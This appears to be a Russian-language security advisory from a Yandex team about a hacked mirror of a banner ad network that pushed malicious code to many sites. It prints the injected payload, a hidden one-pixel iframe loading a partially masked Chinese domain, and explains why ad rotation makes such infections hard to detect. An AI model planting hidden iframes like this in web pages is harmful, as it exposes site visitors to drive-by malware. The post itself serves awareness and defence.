В очередной раз хочется обратить внимание на проблему безопасности, связанную с размещением на сайтах рекламных материалов. Баннерные сети являются лакомым куском для вирусописателей, так как, внедрив вредоносный код в такую систему, можно автоматически распространить его на множество сайтов. Недавно такое произошло с довольно широко распространенной в Рунете баннерной системой.
При обращении к определенному URL, которое происходит на странице с рекламой, посылается запрос к одному из зеркал баннерной системы, где и располагаются сами рекламные материалы. Одно из зеркал системы было взломано, в результатае чего на нем был размещен вредоносный код.
В итоге всё превращается в определенный http-запрос, в результате которого вызывается
<iframe src="http://www.li******.cn/?id=#" width=1 height=1 frameborder=0></iframe>
Недавно из-за этого довольно много крупных сайтов представляли угрозу для посетителей и были помечены в результатах поиска Яндекса как потенциально опасные.
Подобные атаки, пожалуй, относятся к классу самых неприятных для антивирусных систем. Дело в том, что в зависимости от того, к какому рекламному серверу произойдет запрос, зависит, будет ли страница содержать вредоносный код или нет. Страница начинает "мигать": вредоносный код то есть, то нет. По нашим сведениям на текущий момент неполадки в работе баннерной системы устранены.
В заключение, хотим еще раз напомнить всем веб-мастерам, что следует взять за правило чрезвычайно внимательно относиться ко всем внешним данным, так или иначе использующимся на вашем сайте. И, к сожалению, баннеры не являются исключением из этого правила.
Группа пролетарского гнева компании Яндекс